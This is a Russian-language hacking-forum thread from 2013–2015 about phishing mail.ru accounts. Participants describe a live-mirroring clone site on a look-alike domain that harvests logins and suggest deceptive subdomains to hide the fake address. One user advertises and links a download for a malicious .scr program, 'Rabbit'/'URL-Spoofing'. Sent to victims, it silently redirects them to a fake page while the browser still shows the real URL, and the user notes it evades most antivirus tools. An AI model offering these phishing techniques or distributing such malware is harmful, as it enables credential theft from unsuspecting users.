HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 03.12.2013, 01:00
mr.borocco
Новичок
Регистрация: 22.03.2012
Сообщений: 8
С нами: 7442966

Репутация: 0
По умолчанию

Бесполезная вещь)

1) Надо закинуть жертве файл. уж лучше закинуть что нибудь стоящее чем, скрипт который подменить адресную строку)
2) Чтобы жертва не видела адрес фейка, используйте поддомены e.mail.ru.cgi-bin.ru например)
 
Ответить с цитированием

  #2  
Старый 03.12.2013, 01:00
kaleka444
Новичок
Регистрация: 09.10.2013
Сообщений: 5
С нами: 6627926

Репутация: 0
По умолчанию

Цитата:

Сообщение от mr.borocco

Бесполезная вещь)

1) Надо закинуть жертве файл. уж лучше закинуть что нибудь стоящее чем, скрипт который подменить адресную строку)
2) Чтобы жертва не видела адрес фейка, используйте поддомены e.mail.ru.cgi-bin.ru например)

Я так же думаю))
короче так: ПРИМЕР

Есть сайт http://balabol.biz/
Я купил домен http://balabol.biz.az/

Товарищ мой сделал для меня скрипт который (каким то образом) копирует весь сайт balabol.biz

В итоге я имею сайт http://balabol.biz.az/,, полную копию оригинала который копирует оригинал в реальном времени.
Единственный минус((
Есть проблемы с авторизацией на фейке, когда получается авторизоваться а когда нет!! Что то с куками надо разбираться.
Проще говоря жертва вводит данные на фейке и его авторизует как на настоящем сайте
 
Ответить с цитированием

  #3  
Старый 13.12.2013, 01:00
MOV_EAX
Участник форума
Регистрация: 10.02.2010
Сообщений: 181
С нами: 8553206

Репутация: 5
По умолчанию

Цитата:

Сообщение от kaleka444

Я так же думаю))
короче так: ПРИМЕР

Есть сайт http://balabol.biz/
Я купил домен http://balabol.biz.az/

Товарищ мой сделал для меня скрипт который (каким то образом) копирует весь сайт balabol.biz

В итоге я имею сайт http://balabol.biz.az/,, полную копию оригинала который копирует оригинал в реальном времени.
Единственный минус((
Есть проблемы с авторизацией на фейке, когда получается авторизоваться а когда нет!! Что то с куками надо разбираться.
Проще говоря жертва вводит данные на фейке и его авторизует как на настоящем сайте

ну понятно на вкус и цвет товарища нет ,кто любит дыню, а кто арбуз, о вкусах не спорят ты знал об этом?

написал Программу на асме и часть кода на vbs ,прога несёт имя rabbitто есть заяц ,кратко:прога меняет адресную строку браузера в УРЛ допустим Вы скинули жертве
(файл-фейк rabbit.scr) через некоторое время до пустим через два три часа жертва решила авторизоваться на маил.ру ,и Человек когда будет в строке вводит слово mail.ru его скинет на Ваш фейк но в адресной строке браузера останется оригинальная страница http://mail.ru
кому нужно стучитесь за прогой в аську ,раздача до конца этого года Автор проги в теме,
описание и.т.д по аське

скрин клац
IMAGE http://img.pixs.ru/storage/2/5/8/rjpg_3806710_10076258.jpg
 
Ответить с цитированием

  #4  
Старый 17.12.2013, 01:00
MOV_EAX
Участник форума
Регистрация: 10.02.2010
Сообщений: 181
С нами: 8553206

Репутация: 5
По умолчанию

раздача продолжается пока палится одним антивирусом ,UP.

DOWNLOAD

IMAGE http://img.pixs.ru/storage/2/5/8/rjpg_3806710_10076258.jpg

pass: 123
 
Ответить с цитированием

  #5  
Старый 27.01.2014, 01:00
MOV_EAX
Участник форума
Регистрация: 10.02.2010
Сообщений: 181
С нами: 8553206

Репутация: 5
По умолчанию

исправлены баги ,описание и сама прога внутри архива .
Rabbit v1.0
IMAGE http://i7.pixs.ru/storage/7/3/9/rabbit1bmp_9519954_10628739.jpg

пройти по ссылке и загрузить http://zalil.ru/34935895 Rabbit v1.0

http://www.securitylab.ru/forum/mess...#message414687
 
Ответить с цитированием

  #6  
Старый 11.09.2014, 01:00
labvictx
Новичок
Регистрация: 19.04.2009
Сообщений: 0
С нами: 8980877

Репутация: 0
По умолчанию

Цитата:

Сообщение от MOV_EAX

исправлены баги ,описание и сама прога внутри архива .
Rabbit v1.0
IMAGE http://i7.pixs.ru/storage/7/3/9/rabbit1bmp_9519954_10628739.jpg

пройти по ссылке и загрузить http://zalil.ru/34935895 Rabbit v1.0

http://www.securitylab.ru/forum/mess...#message414687

Сервер не найден
Браузер не может найти сервер zalil.ru.
Плиз, перезалейте
 
Ответить с цитированием

  #7  
Старый 26.11.2014, 01:00
MOV_EAX
Участник форума
Регистрация: 10.02.2010
Сообщений: 181
С нами: 8553206

Репутация: 5
По умолчанию

вставляем в нашу прогу адрес урл касс.ру запускаем наш файл по фишингу ,после перeходим на майл.ру но у нас после перехода на майл.ру все же перекидывает на касс.ру но в адресной строке браусера остается майл.ру, и не каких подозрений.

значит просто касс.ру <----- будто наш фейк
вогнали ?

ссылка на видео
Файл № 42377545 подтвержден
Название: f.rar
Размер: 20.45 Мб
Доступен до: 2014-12-26 13:34:54
Ссылка для скачивания файла: http://zalil-slil.rusfolder.net/files/42377545
 
Ответить с цитированием

  #8  
Старый 03.01.2015, 01:00
MOV_EAX
Участник форума
Регистрация: 10.02.2010
Сообщений: 181
С нами: 8553206

Репутация: 5
По умолчанию

Дополнительное объяснение:читать в readme.txt обязательно.

обновление проги: Ссылка на страницу загрузки:
http://my-files.ru/z8pdk7

PHP highlight

Код:
Код:
http://pixs.ru/showimage/spbmp_3556065_15419125.jpg 


URL-Spoofing mail.ru v.1.0.1
____________________________
Фишинг mail.ru Смена URL в адресной строке браузера
 
Ответить с цитированием

  #9  
Старый 11.01.2015, 01:00
MOV_EAX
Участник форума
Регистрация: 10.02.2010
Сообщений: 181
С нами: 8553206

Репутация: 5
По умолчанию

URL-Spoofing v.1.5

видео
Доступен до: 2015-02-10 19:44:01
Описание: URL-Spoofing v.1.5
Ссылка для скачивания файла: http://webfiles.ru/files/42723904
IMAGE http://www.bank-of-africa.net/sites/all/themes/boa_grp/logo.png

подмена всех урл адресов

+ вставляем нужный нам содержимое мета тег
+ ссылку на Ваш фейк
+ урл адрес оригинальной страницы

и кидаем файл жертве.
видео нa rutube часть 2
http://rutube.ru/video/a215aec5716cc...45f5ee04a5cae/
 
Ответить с цитированием

  #10  
Старый 18.03.2015, 01:00
noolname
Новичок
Регистрация: 21.03.2007
Сообщений: 3
С нами: 10074278

Репутация: 0
По умолчанию

Почему страница ввода пароля, не похожа на мейл.ру? Или это только на видео так?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.